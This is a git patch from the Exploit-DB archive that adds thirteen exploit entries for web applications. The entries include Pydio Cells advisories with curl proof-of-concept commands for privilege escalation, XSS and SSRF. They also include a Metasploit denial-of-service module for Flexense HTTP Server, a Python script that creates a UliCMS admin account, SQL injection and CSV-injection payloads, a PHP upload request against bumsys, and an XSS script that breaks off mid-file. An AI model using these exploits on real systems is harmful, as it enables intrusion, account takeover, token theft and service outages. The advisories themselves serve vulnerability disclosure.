From cb5c64da21a466f22c7bd4afd4ee64ccec15326c Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Thu, 1 Jun 2023 00:16:25 +0000 Subject: [PATCH] DB: 2023-06-01 13 changes to exploits/shellcodes/ghdb Pydio Cells 4.1.2 - Cross-Site Scripting (XSS) via File Download Pydio Cells 4.1.2 - Server-Side Request Forgery Pydio Cells 4.1.2 - Unauthorised Role Assignments Flexense HTTP Server 10.6.24 - Buffer Overflow (DoS) (Metasploit) MotoCMS Version 3.4.3 - Server-Side Template Injection (SSTI) Faculty Evaluation System 1.0 - Unauthenticated File Upload Online Security Guards Hiring System 1.0 - Reflected XSS Online shopping system advanced 1.0 - Multiple Vulnerabilities Rukovoditel 3.3.1 - CSV injection SCRMS 2023-05-27 1.0 - Multiple SQL Injection Service Provider Management System v1.0 - SQL Injection Ulicms-2023.1-sniffing-vicuna - Privilege escalation unilogies/bumsys v1.0.3 beta - Unrestricted File Upload --- exploits/go/webapps/51496.txt | 217 ++++++++++++++++++++++++++++ exploits/go/webapps/51497.txt | 195 +++++++++++++++++++++++++ exploits/go/webapps/51498.txt | 148 +++++++++++++++++++ exploits/multiple/remote/51493.rb | 98 +++++++++++++ exploits/multiple/webapps/51499.txt | 38 +++++ exploits/php/webapps/51433.py | 32 ++++ exploits/php/webapps/51490.txt | 19 +++ exploits/php/webapps/51491.txt | 50 +++++++ exploits/php/webapps/51492.txt | 106 ++++++++++++++ exploits/php/webapps/51494.py | 94 ++++++++++++ exploits/php/webapps/51495.py | 115 +++++++++++++++ files_exploits.csv | 15 +- ghdb.xml | 122 ++++++++++++++++ 13 files changed, 1247 insertions(+), 2 deletions(-) create mode 100644 exploits/go/webapps/51496.txt create mode 100644 exploits/go/webapps/51497.txt create mode 100644 exploits/go/webapps/51498.txt create mode 100755 exploits/multiple/remote/51493.rb create mode 100644 exploits/multiple/webapps/51499.txt create mode 100755 exploits/php/webapps/51433.py create mode 100644 exploits/php/webapps/51490.txt create mode 100644 exploits/php/webapps/51491.txt create mode 100644 exploits/php/webapps/51492.txt create mode 100755 exploits/php/webapps/51494.py create mode 100755 exploits/php/webapps/51495.py diff --git a/exploits/go/webapps/51496.txt b/exploits/go/webapps/51496.txt new file mode 100644 index 000000000..8688af544 --- /dev/null +++ b/exploits/go/webapps/51496.txt @@ -0,0 +1,217 @@ +Exploit Title: Pydio Cells 4.1.2 - Unauthorised Role Assignments +Affected Versions: 4.1.2 and earlier versions +Fixed Versions: 4.2.0, 4.1.3, 3.0.12 +Vulnerability Type: Privilege Escalation +Security Risk: high +Vendor URL: https://pydio.com/ +Vendor Status: notified +Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-003 +Advisory Status: published +CVE: CVE-2023-32749 +CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32749 + + +Introduction +============ + +"Pydio Cells is an open-core, self-hosted Document Sharing and +Collaboration platform (DSC) specifically designed for organizations +that need advanced document sharing and collaboration without security +trade-offs or compliance issues." + +(from the vendor's homepage) + + +More Details +============ + +Users can share cells or folders with other users on the same Pydio +instance. The web application allows to either select an already +existing user from a list or to create a new user by entering a new +username and password, if this functionality is enabled. When creating a +new user in this way, a HTTP PUT request like the following is sent: + +------------------------------------------------------------------------ +PUT /a/user/newuser HTTP/2 +Host: example.com +User-Agent: agent +Authorization: Bearer O48gvjD[...] +Content-Type: application/json +Content-Length: 628 +Cookie: token=AO[...] + +{ + "Attributes": { + "profile": "shared", + "parameter:core.conf:lang": "\"en-us\"", + "send_email": "false" + }, + "Roles": [], + "Login": "newuser", + "Password": "secret!", + "GroupPath": "/", + "Policies": [...] +} +------------------------------------------------------------------------ + +The JSON object sent in the body contains the username and password +for the user to be created and an empty list for the key "Roles". The +response contains a JSON object similar to the following: + +------------------------------------------------------------------------ +{ + "Uuid": "58811c4c-2286-4ca0-8e8a-14ab9dbca8ce", + "GroupPath": "/", + "Attributes": { + "parameter:core.conf:lang": "\"en-us\"", + "profile": "shared" + }, + "Roles": [ + { + "Uuid": "EXTERNAL_USERS", + "Label": "External Users", + "Policies": [...] + }, + { + "Uuid": "58811c4c-2286-4ca0-8e8a-14ab9dbca8ce", + "Label": "User newuser", + "UserRole": true, + "Policies": [...] + } + ], + "Login": "newuser", + "Policies": [....], + "PoliciesContextEditable": true +} +------------------------------------------------------------------------ + +The key "Roles" now contains a list with two objects, which seem to be +applied by default. The roles list in the HTTP request can be +modified to contain a list of all available UUIDs for roles, which can +be obtained by using the user search functionality. This results in a +new user account with all roles applied. By performing a login as the +newly created user, access to all cells and non-personal workspaces of +the whole Pydio instance is granted. + + +Proof of Concept +================ + +Login to the Pydio Cells web interface with a regular user and retrieve +the JWT from the HTTP requests. This can either be done using an HTTP +attack proxy or using the browser's developer tools. Subsequently, curl [1] +can be used as follows to retrieve a list of all users and their roles: + +------------------------------------------------------------------------ +$ export JWT="" +$ curl --silent \ +--header "Authorization: Bearer $TOKEN" \ +--header 'Content-Type: application/json' \ +--data '{}' \ +https://example.com/a/user | tee all_users.json + +{"Users":[...]} +------------------------------------------------------------------------ + +Afterwards, jq [2] can be used to create a JSON document which can be +sent to the Pydio REST-API in order to create the external user "foobar" +with the password "hunter2" and all roles assigned: + +------------------------------------------------------------------------ +$ jq '.Users[].Roles' all_users.json \ +| jq -s 'flatten | .[].Uuid | {Uuid: .}' \ +| jq -s 'unique' \ +| jq '{"Login": "foobar", "Password": "hunter2", "Attributes": +{"profile": "shared"}, "Roles": .}' \ +| tee create_user.json + +{ + "Login": "foobar", + "Password": "hunter2", + "Attributes": { + "profile": "shared" + }, + "Roles": [...] +} +------------------------------------------------------------------------ + +Finally, the following curl command can be issued to create the new external +user: + +------------------------------------------------------------------------ +$ curl --request PUT \ +--silent \ +--header "Authorization: Bearer $JWT" \ +--header 'Content-Type: application/json' \ +--data @create_user.json \ +https://example.com/a/user/foobar +------------------------------------------------------------------------ + +Now, login with the newly created user to access all cells and +non-personal workspaces. + +Workaround +========== + +Disallow the creation of external users in the authentication settings. + + +Fix +=== + +Upgrade Pydio Cells to a version without the vulnerability. + + +Security Risk +============= + +Attackers with access to any regular user account for a Pydio Cells instance can +extend their privileges by creating a new external user with all roles +assigned. Subsequently, they can access all folders and files in any +cell and workspace, except for personal workspaces. The creation of +external users is activated by default. Therefore, the vulnerability is +estimated to pose a high risk. + + +Timeline +======== + +2023-03-23 Vulnerability identified +2023-05-02 Customer approved disclosure to vendor +2023-05-02 Vendor notified +2023-05-03 CVE ID requested +2023-05-08 Vendor released fixed version +2023-05-14 CVE ID assigned +2023-05-16 Vendor asks for a few more days before the advisory is released +2023-05-30 Advisory released + + +References +========== + +[1] https://curl.se/ +[2] https://stedolan.github.io/jq/ + + +RedTeam Pentesting GmbH +======================= + +RedTeam Pentesting offers individual penetration tests performed by a +team of specialised IT-security experts. Hereby, security weaknesses in +company networks or products are uncovered and can be fixed immediately. + +As there are only few experts in this field, RedTeam Pentesting wants to +share its knowledge and enhance the public knowledge with research in +security-related areas. The results are made available as public +security advisories. + +More information about RedTeam Pentesting can be found at: +https://www.redteam-pentesting.de/ + + +Working at RedTeam Pentesting +============================= + +RedTeam Pentesting is looking for penetration testers to join our team +in Aachen, Germany. If you are interested please visit: +https://jobs.redteam-pentesting.de/ \ No newline at end of file diff --git a/exploits/go/webapps/51497.txt b/exploits/go/webapps/51497.txt new file mode 100644 index 000000000..97696fc19 --- /dev/null +++ b/exploits/go/webapps/51497.txt @@ -0,0 +1,195 @@ +Exploit Title: Pydio Cells 4.1.2 - Cross-Site Scripting (XSS) via File Download +Affected Versions: 4.1.2 and earlier versions +Fixed Versions: 4.2.0, 4.1.3, 3.0.12 +Vulnerability Type: Cross-Site Scripting +Security Risk: high +Vendor URL: https://pydio.com/ +Vendor Status: notified +Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-004 +Advisory Status: published +CVE: CVE-2023-32751 +CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32751 + + +Introduction +============ + +"Pydio Cells is an open-core, self-hosted Document Sharing and +Collaboration platform (DSC) specifically designed for organizations +that need advanced document sharing and collaboration without security +trade-offs or compliance issues." + +(from the vendor's homepage) + + +More Details +============ + +When a file named "xss.html" is downloaded in the Pydio Cells web application, a +download URL similar to the following is generated: + +https://example.com/io/xss/xss.html + ?AWSAccessKeyId=gateway + &Expires=1682495748 + &Signature=920JV0Zy%2BrNYXjak7xksAxRpRp8%3D + &response-content-disposition=attachment%3B%20filename%3Dxss.html + &pydio_jwt=qIe9DUut-OicxRzNVlynMf6CTENB0J-J[...] + +The URL is akin to a presigned URL as used by the Amazon S3 service. It +contains the URL parameter "response-content-disposition" which is set +to "attachment" causing the response to contain a "Content-Disposition" +header with that value. Therefore, the browser downloads the file +instead of interpreting it. The URL also contains a signature and expiry +timestamp, which are checked by the backend. Unlike a presigned URL as used +by S3, the URL also contains the parameter "pydio_jwt" with the JWT of +the user for authentication. Furthermore, the access key with the ID +"gateway" is referenced, which can be found in the JavaScript sources of +Pydio Cells together with the secret: + +------------------------------------------------------------------------ +_awsSdk.default.config.update({ + accessKeyId: 'gateway', + secretAccessKey: 'gatewaysecret', + s3ForcePathStyle: !0, + httpOptions: { + timeout: PydioApi.getMultipartUploadTimeout() + } +}); +------------------------------------------------------------------------ + +With this information it is possible to change the URL parameter +"response-content-disposition" to the value "inline" and then calculate +a valid signature for the resulting URL. Furthermore, the content type of +the response can be changed to "text/html" by also adding the URL +parameter "response-content-type" with that value. This would result in +a URL like the following for the previously shown example URL: + +https://example.com/io/xss/xss.html? + AWSAccessKeyId=gateway + &Expires=1682495668 + &Signature=HpKue0YQZrnp%2B665Jf1t7ONgfRg%3D + &response-content-disposition=inline + &response-content-type=text%2Fhtml + &pydio_jwt=qIe9DUut-OicxRzNVlynMf6CTENB0J-J[...] + +Upon opening the URL in a browser, the HTML included in the file is +interpreted and any JavaScript code is run. + +Proof of Concept +================ + +Upload a HTML file into an arbitrary location of a Pydio Cells instance. +For example with the following contents: + +------------------------------------------------------------------------ + + +

Cross-Site Scriping

+ + + +------------------------------------------------------------------------ + +The contained JavaScript code reads the JWT access token for Pydio Cells +from the browser's local storage object and opens a message box. Instead +of just displaying the JWT, it could also be sent to an attacker. The +following JavaScript function can then be run within the browser's +developer console to generate a presigned URL for the HTML file: + +------------------------------------------------------------------------ +async function getPresignedURL(path) { + let client = PydioApi.getClient(); + let node = new AjxpNode(path); + let metadata = {Bucket: "io", ResponseContentDisposition: "inline", Key: path, ResponseContentType: "text/html"}; + let url = await client.buildPresignedGetUrl(node, null, "text/html", metadata); + + return url; +} + +await getPresignedURL("xss/xss.html"); +------------------------------------------------------------------------ + +The code has to be run in context of Pydio Cells while being logged in. +If the resulting URL is opened in a browser, the JavaScript code +contained in the HTML file is run. If the attack is conducted in the +described way, the JWT of the attacker is exposed through the URL. +However, this can be circumvented by first generating a public URL +for the file and then constructing the presigned URL based on the +resulting download URL. + + +Workaround +========== + +No workaround known. + + +Fix +=== + +Upgrade Pydio Cells to a version without the vulnerability. + + +Security Risk +============= + +Attackers that can upload files to a Pydio Cells instance can construct +URLs that execute arbitrary JavaScript code in context of Pydio Cells +upon opening. This could for example be used to steal the authentication +tokens of users opening the URL. It is likely that such an attack +succeeds, since sharing URLs to files hosted using Pydio Cells is a +common use case of the application. Therefore, the vulnerability is +estimated to pose a high risk. + + +Timeline +======== + +2023-03-23 Vulnerability identified +2023-05-02 Customer approved disclosure to vendor +2023-05-02 Vendor notified +2023-05-03 CVE ID requested +2023-05-08 Vendor released fixed version +2023-05-14 CVE ID assigned +2023-05-16 Vendor asks for a few more days before the advisory is released +2023-05-30 Advisory released + + +References +========== + +[1] https://aws.amazon.com/sdk-for-javascript/ + + +RedTeam Pentesting GmbH +======================= + +RedTeam Pentesting offers individual penetration tests performed by a +team of specialised IT-security experts. Hereby, security weaknesses in +company networks or products are uncovered and can be fixed immediately. + +As there are only few experts in this field, RedTeam Pentesting wants to +share its knowledge and enhance the public knowledge with research in +security-related areas. The results are made available as public +security advisories. + +More information about RedTeam Pentesting can be found at: +https://www.redteam-pentesting.de/ + + +Working at RedTeam Pentesting +============================= + +RedTeam Pentesting is looking for penetration testers to join our team +in Aachen, Germany. If you are interested please visit: +https://jobs.redteam-pentesting.de/ + +-- +RedTeam Pentesting GmbH Tel.: +49 241 510081-0 +Alter Posthof 1 Fax : +49 241 510081-99 +52062 Aachen https://www.redteam-pentesting.de +Germany Registergericht: Aachen HRB 14004 +Geschäftsführer: Patrick Hof, Jens Liebchen \ No newline at end of file diff --git a/exploits/go/webapps/51498.txt b/exploits/go/webapps/51498.txt new file mode 100644 index 000000000..0ef9b9a01 --- /dev/null +++ b/exploits/go/webapps/51498.txt @@ -0,0 +1,148 @@ +Exploit Title: Pydio Cells 4.1.2 - Server-Side Request Forgery +Affected Versions: 4.1.2 and earlier versions +Fixed Versions: 4.2.0, 4.1.3, 3.0.12 +Vulnerability Type: Server-Side Request Forgery +Security Risk: medium +Vendor URL: https://pydio.com/ +Vendor Status: notified +Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-005 +Advisory Status: published +CVE: CVE-2023-32750 +CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32750 + + +Introduction +============ + +"Pydio Cells is an open-core, self-hosted Document Sharing and +Collaboration platform (DSC) specifically designed for organizations +that need advanced document sharing and collaboration without security +trade-offs or compliance issues." + +(from the vendor's homepage) + + +More Details +============ + +Using the REST-API of Pydio Cells it is possible to start jobs. For +example, when renaming a file or folder an HTTP request similar to the +following is sent: + +------------------------------------------------------------------------ +PUT /a/jobs/user/move HTTP/2 +Host: example.com +User-Agent: agent +Accept: application/json +Authorization: Bearer G4ZRN[...] +Content-Type: application/json +Content-Length: 140 + +{ + "JobName": "move", + "JsonParameters": "{\"nodes\":[\"cell/file.txt\"],\"target\":\"cell/renamed.txt\",\"targetParent\":false}" +} +------------------------------------------------------------------------ + +The body contains a JSON object with a job name and additional +parameters for the job. Besides the "move" job, also a job with the name +"remote-download" exists. It takes two additional parameters: "urls" and +"target". In the "urls" parameter, a list of URLs can be specified and in +the parameter "target" a path can be specified in which to save the +response. When the job is started, HTTP GET requests are sent from the +Pydio Cells server to the specified URLs. The responses are saved into a +file, which are uploaded to the specified folder within Pydio Cells. +Potential errors are transmitted in a WebSocket channel, which can be +opened through the "/ws/event" endpoint. + + +Proof of Concept +================ + +Log into Pydio Cells and retrieve the JWT from the HTTP requests. Then, +run the following commands to start a "remote-download" job to trigger +an HTTP request: + +------------------------------------------------------------------------ +$ export JWT="" + +$ echo '{"urls": ["http://localhost:8000/internal.html"], "target": "personal-files"}' \ +| jq '{"JobName": "remote-download", "JsonParameters": (. | tostring)}' \ +| tee remote-download.json + +$ curl --header "Authorization: Bearer $JWT" \ +--header 'Content-Type: application/json' \ +--request PUT \ +--data @remote-download.json 'https://example.com/a/jobs/user/remote-download' +------------------------------------------------------------------------ + +The URL in the JSON document specifies which URL to request. The "target" +field in the same document specifies into which folder the response is saved. +Afterwards, the response is contained in a file in the specified folder. +Potential errors are communicated through the WebSocket channel. + + +Workaround +========== + +Limit the services which can be reached by the Pydio Cells server, for +example using an outbound firewall. + + +Fix +=== + +Upgrade Pydio Cells to a version without the vulnerability. + + +Security Risk +============= + +The risk is highly dependent on the environment in which the attacked +Pydio Cells instance runs. If there are any internal HTTP services which +expose sensitive data on the same machine or within the same network, +the server-side request forgery vulnerability could pose a significant +risk. In other circumstances, the risk could be negligible. Therefore, +overall the vulnerability is rated as a medium risk. + + +Timeline +======== + +2023-03-23 Vulnerability identified +2023-05-02 Customer approved disclosure to vendor +2023-05-02 Vendor notified +2023-05-03 CVE ID requested +2023-05-08 Vendor released fixed version +2023-05-14 CVE ID assigned +2023-05-16 Vendor asks for a few more days before the advisory is released +2023-05-30 Advisory released + + +References +========== + + + +RedTeam Pentesting GmbH +======================= + +RedTeam Pentesting offers individual penetration tests performed by a +team of specialised IT-security experts. Hereby, security weaknesses in +company networks or products are uncovered and can be fixed immediately. + +As there are only few experts in this field, RedTeam Pentesting wants to +share its knowledge and enhance the public knowledge with research in +security-related areas. The results are made available as public +security advisories. + +More information about RedTeam Pentesting can be found at: +https://www.redteam-pentesting.de/ + + +Working at RedTeam Pentesting +============================= + +RedTeam Pentesting is looking for penetration testers to join our team +in Aachen, Germany. If you are interested please visit: +https://jobs.redteam-pentesting.de/ \ No newline at end of file diff --git a/exploits/multiple/remote/51493.rb b/exploits/multiple/remote/51493.rb new file mode 100755 index 000000000..be53d22d0 --- /dev/null +++ b/exploits/multiple/remote/51493.rb @@ -0,0 +1,98 @@ +## +# Exploit Title: Flexense HTTP Server 10.6.24 - Buffer Overflow (DoS) (Metasploit) +# Date: 2018-03-09 +# Exploit Author: Ege Balci +# Vendor Homepage: https://www.flexense.com/downloads.html +# Version: <= 10.6.24 +# CVE : CVE-2018-8065 + +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + include Msf::Auxiliary::Dos + include Msf::Exploit::Remote::Tcp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Flexense HTTP Server Denial Of Service', + 'Description' => %q{ + This module triggers a Denial of Service vulnerability in the Flexense HTTP server. + Vulnerability caused by a user mode write access memory violation and can be triggered with + rapidly sending variety of HTTP requests with long HTTP header values. + + Multiple Flexense applications that are using Flexense HTTP server 10.6.24 and below vesions reportedly vulnerable. + }, + 'Author' => [ 'Ege Balci ' ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2018-8065'], + [ 'URL', 'https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS' ], + ], + 'DisclosureDate' => '2018-03-09')) + + register_options( + [ + Opt::RPORT(80), + OptString.new('PacketCount', [ true, "The number of packets to be sent (Recommended: Above 1725)" , 1725 ]), + OptString.new('PacketSize', [ true, "The number of bytes in the Accept header (Recommended: 4088-5090" , rand(4088..5090) ]) + ]) + + end + + def check + begin + connect + sock.put("GET / HTTP/1.0\r\n\r\n") + res = sock.get + if res and res.include? 'Flexense HTTP Server v10.6.24' + Exploit::CheckCode::Appears + else + Exploit::CheckCode::Safe + end + rescue Rex::ConnectionRefused + print_error("Target refused the connection") + Exploit::CheckCode::Unknown + rescue + print_error("Target did not respond to HTTP request") + Exploit::CheckCode::Unknown + end + end + + def run + unless check == Exploit::CheckCode::Appears + fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') + end + + size = datastore['PacketSize'].to_i + print_status("Starting with packets of #{size}-byte strings") + + count = 0 + loop do + payload = "" + payload << "GET /" + Rex::Text.rand_text_alpha(rand(30)) + " HTTP/1.1\r\n" + payload << "Host: 127.0.0.1\r\n" + payload << "Accept: "+('A' * size)+"\r\n" + payload << "\r\n\r\n" + begin + connect + sock.put(payload) + disconnect + count += 1 + break if count==datastore['PacketCount'] + rescue ::Rex::InvalidDestination + print_error('Invalid destination! Continuing...') + rescue ::Rex::ConnectionTimeout + print_error('Connection timeout! Continuing...') + rescue ::Errno::ECONNRESET + print_error('Connection reset! Continuing...') + rescue ::Rex::ConnectionRefused + print_good("DoS successful after #{count} packets with #{size}-byte headers") + return true + end + end + print_error("DoS failed after #{count} packets of #{size}-byte strings") + end +end \ No newline at end of file diff --git a/exploits/multiple/webapps/51499.txt b/exploits/multiple/webapps/51499.txt new file mode 100644 index 000000000..30d120637 --- /dev/null +++ b/exploits/multiple/webapps/51499.txt @@ -0,0 +1,38 @@ +# Title: MotoCMS Version 3.4.3 - Server-Side Template Injection (SSTI) +# Author: tmrswrr +# Date: 31/05/2023 +# Vendor: https://www.motocms.com +# Link: https://www.motocms.com/website-templates/demo/189526.html +# Vulnerable Version(s): MotoCMS 3.0.27 + + +## Description +MotoCMS Version 3.4.3 Store Category Template was discovered to contain a Server-Side Template +Injection (SSTI) vulnerability via the keyword parameter. + +## Steps to Reproduce +1. Open the target URL: https://template189526.motopreview.com/ +2. Write payload here : https://template189526.motopreview.com/store/category/search/?page=1&limit=36&keyword={{7*7}} +3. You will be see result is 49 + + + +Vuln Url : https://template189526.motopreview.com/store/category/search/?page=1&limit=36&keyword={{7*7}} + + +GET /store/category/search/?page=&limit=&keyword={{7*7}} HTTP/1.1 +Host: template189526.motopreview.com +Cookie: PHPSESSID=7c0qgdvsehaf1a2do6s0bcl4p0; 9b7029e0bd3be0d41ebefd47d9f5ae46_session-started=1685536759239 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Dnt: 1 +Referer: https://template189526.motopreview.com/store/category/search/?keyword=%7B%7B3*3%7D%7D +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: iframe +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Sec-Fetch-User: ?1 +Te: trailers +Connection: close \ No newline at end of file diff --git a/exploits/php/webapps/51433.py b/exploits/php/webapps/51433.py new file mode 100755 index 000000000..61c167de2 --- /dev/null +++ b/exploits/php/webapps/51433.py @@ -0,0 +1,32 @@ +#Exploit Title: Ulicms 2023.1 sniffing-vicuna - Privilege escalation +#Application: Ulicms +#Version: 2023.1-sniffing-vicuna +#Bugs: Privilege escalation +#Technology: PHP +#Vendor URL: https://en.ulicms.de/ +#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip +#Date of found: 04-05-2023 +#Author: Mirabbas Ağalarov +#Tested on: Linux + +##This code is written in python and helps to create an admin account on ulicms-2023.1-sniffing-vicuna + +import requests + +new_name=input("name: ") +new_email=input("email: ") +new_pass=input("password: ") + +url = "http://localhost/dist/admin/index.php" + +headers = {"Content-Type": "application/x-www-form-urlencoded"} + +data = f"sClass=UserController&sMethod=create&add_admin=add_admin&username={new_name}&firstname={new_name}&lastname={new_name}&email={new_email}&password={new_pass}&password_repeat={new_pass}&group_id=1&admin=1&default_language=" + +response = requests.post(url, headers=headers, data=data) + +if response.status_code == 200: + print("Request is success and created new admin account") + +else: + print("Request is failure.!!") \ No newline at end of file diff --git a/exploits/php/webapps/51490.txt b/exploits/php/webapps/51490.txt new file mode 100644 index 000000000..52b640510 --- /dev/null +++ b/exploits/php/webapps/51490.txt @@ -0,0 +1,19 @@ +Exploit Title: Rukovoditel 3.3.1 - CSV injection +Version: 3.3.1 +Bugs: CSV Injection +Technology: PHP +Vendor URL: https://www.rukovoditel.net/ +Software Link: https://www.rukovoditel.net/download.php +Date of found: 27-05-2023 +Author: Mirabbas Ağalarov +Tested on: Linux + + +2. Technical Details & POC +======================================== +Step 1. login as user +step 2. Go to My Account ( http://127.0.0.1/index.php?module=users/account ) +step 3. Set Firstname as =calc|a!z| +step 3. If admin Export costumers as CSV file ,in The computer of admin occurs csv injection and will open calculator (http://localhost/index.php?module=items/items&path=1) + +payload: =calc|a!z| \ No newline at end of file diff --git a/exploits/php/webapps/51491.txt b/exploits/php/webapps/51491.txt new file mode 100644 index 000000000..eec7eb993 --- /dev/null +++ b/exploits/php/webapps/51491.txt @@ -0,0 +1,50 @@ +## Exploit Title: SCRMS 2023-05-27 1.0 - Multiple SQLi +## Author: nu11secur1ty +## Date: 05.27.2023 +## Vendor: https://github.com/oretnom23 +## Software: https://www.sourcecodester.com/php/15895/simple-customer-relationship-management-crm-system-using-php-free-source-coude.html +## Reference: https://portswigger.net/web-security/sql-injection + +## Description: +The `email` parameter appears to be vulnerable to SQL injection +attacks. The test payloads 45141002' or 6429=6429-- and 37491017' or +5206=5213-- were each submitted in the email parameter. These two +requests resulted in different responses, indicating that the input is +being incorporated into a SQL query in an unsafe way. The attacker can +easily steal all users and their passwords for access to the system. +Even if they are strongly encrypted this will get some time, but this +is not a problem for an attacker to decrypt if, if they are not enough +strongly encrypted. + +STATUS: HIGH Vulnerability + +[+]Payload: +```mysql +--- +Parameter: email (POST) + Type: boolean-based blind + Title: OR boolean-based blind - WHERE or HAVING clause + Payload: email=-1544' OR 2326=2326-- eglC&password=c5K!k0k!T7&login= +--- + +``` + +## Reproduce: +[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/SCRMS-2023-05-27-1.0) + +## Proof and Exploit: +[href](https://www.nu11secur1ty.com/2023/05/scrms-2023-05-27-10-multiple-sqli.html) + +## Time spend: +01:00:00 + + +-- +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at +https://packetstormsecurity.com/https://cve.mitre.org/index.html and +https://www.exploit-db.com/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty \ No newline at end of file diff --git a/exploits/php/webapps/51492.txt b/exploits/php/webapps/51492.txt new file mode 100644 index 000000000..89b292900 --- /dev/null +++ b/exploits/php/webapps/51492.txt @@ -0,0 +1,106 @@ +Exploit Title: - unilogies/bumsys v1.0.3-beta - Unrestricted File Upload +Google Dork : NA +Date: 19-01-2023 +Exploit Author: AFFAN AHMED +Vendor Homepage: https://github.com/unilogies/bumsys +Software Link: https://github.com/unilogies/bumsys/archive/refs/tags/v1.0.3-beta.zip +Version: 1.0.3-beta +Tested on: Windows 11, XAMPP-8.2.0 +CVE : CVE-2023-0455 + + +================================ +Steps_TO_Reproduce +================================ +- Navigate to this URL:[https://demo.bumsys.org/settings/shop-list/](https://demo.bumsys.org/settings/shop-list/) +- Click on action button to edit the Profile +- Click on select logo button to upload the image +- Intercept the POST Request and do the below changes . + +================================================================ +Burpsuite-Request +================================================================ +POST /xhr/?module=settings&page=updateShop HTTP/1.1 +Host: demo.bumsys.org +Cookie: eid=1; currencySymbol=%EF%B7%BC; keepAlive=1; __0bb0b4aaf0f729565dbdb80308adac3386976ad3=9lqop41ssg3i9trh73enqbi0i7 +Content-Length: 1280 +Sec-Ch-Ua: "Chromium";v="109", "Not_A Brand";v="99" +X-Csrf-Token: 78abb0cc27ab54e87f66e8160dab3ab48261a8b4 +Sec-Ch-Ua-Mobile: ?0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynO0QAD84ekUMuGaA +Accept: */* +X-Requested-With: XMLHttpRequest +Sec-Ch-Ua-Platform: "Windows" +Origin: https://demo.bumsys.org +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: https://demo.bumsys.org/settings/shop-list/ +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Connection: close + +------WebKitFormBoundarynO0QAD84ekUMuGaA +Content-Disposition: form-data; name="shopName" + +TEST +------WebKitFormBoundarynO0QAD84ekUMuGaA +Content-Disposition: form-data; name="shopAddress" + + test +------WebKitFormBoundarynO0QAD84ekUMuGaA +Content-Disposition: form-data; name="shopCity" + +testcity +------WebKitFormBoundarynO0QAD84ekUMuGaA +Content-Disposition: form-data; name="shopState" + +teststate +------WebKitFormBoundarynO0QAD84ekUMuGaA +Content-Disposition: form-data; name="shopPostalCode" + +700056 +------WebKitFormBoundarynO0QAD84ekUMuGaA +Content-Disposition: form-data; name="shopCountry" + +testIND +------WebKitFormBoundarynO0QAD84ekUMuGaA +Content-Disposition: form-data; name="shopPhone" + +895623122 +------WebKitFormBoundarynO0QAD84ekUMuGaA +Content-Disposition: form-data; name="shopEmail" + +test@gmail.com +------WebKitFormBoundarynO0QAD84ekUMuGaA +Content-Disposition: form-data; name="shopInvoiceFooter" + + +------WebKitFormBoundarynO0QAD84ekUMuGaA +Content-Disposition: form-data; name="shopLogo"; filename="profile picture.php" +Content-Type: image/png + + + + +==================================================================================== +Burpsuite-Response +==================================================================================== +HTTP/1.1 200 OK +Date: Thu, 19 Jan 2023 07:14:26 GMT +Server: Apache/2.4.51 (Unix) OpenSSL/1.0.2k-fips +X-Powered-By: PHP/7.0.33 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Connection: close +Content-Type: text/html; charset=UTF-8 +Content-Length: 65 + +
Shop successfully updated.
+ + +==================================================================================== + +VIDEO-POC : https://youtu.be/nwxIoSlyllQ \ No newline at end of file diff --git a/exploits/php/webapps/51494.py b/exploits/php/webapps/51494.py new file mode 100755 index 000000000..38ad856c9 --- /dev/null +++ b/exploits/php/webapps/51494.py @@ -0,0 +1,94 @@ +#Exploit Title: Online Security Guards Hiring System 1.0 – REFLECTED XSS +#Google Dork : NA +#Date: 23-01-2023 +#Exploit Author : AFFAN AHMED +#Vendor Homepage: https://phpgurukul.com +#Software Link: https://phpgurukul.com/projects/Online-Security-Guard-Hiring-System_PHP.zip +#Version: 1.0 +#Tested on: Windows 11 + XAMPP + PYTHON-3.X +#CVE : CVE-2023-0527 + +#NOTE: TO RUN THE PROGRAM FIRST SETUP THE CODE WITH XAMPP AND THEN RUN THE BELOW PYTHON CODE TO EXPLOIT IT +# Below code check for both the parameter /admin-profile.php and in /search.php + +#POC-LINK: https://github.com/ctflearner/Vulnerability/blob/main/Online-Security-guard-POC.md + + +import requests +import re +from colorama import Fore + +print(Fore.YELLOW + "######################################################################" + Fore.RESET) +print(Fore.RED + "# TITLE: Online Security Guards Hiring System v1.0" + Fore.RESET) +print(Fore.RED + "# VULNERABILITY-TYPE : CROSS-SITE SCRIPTING (XSS)" + Fore.RESET) +print(Fore.RED + "# VENDOR OF THE 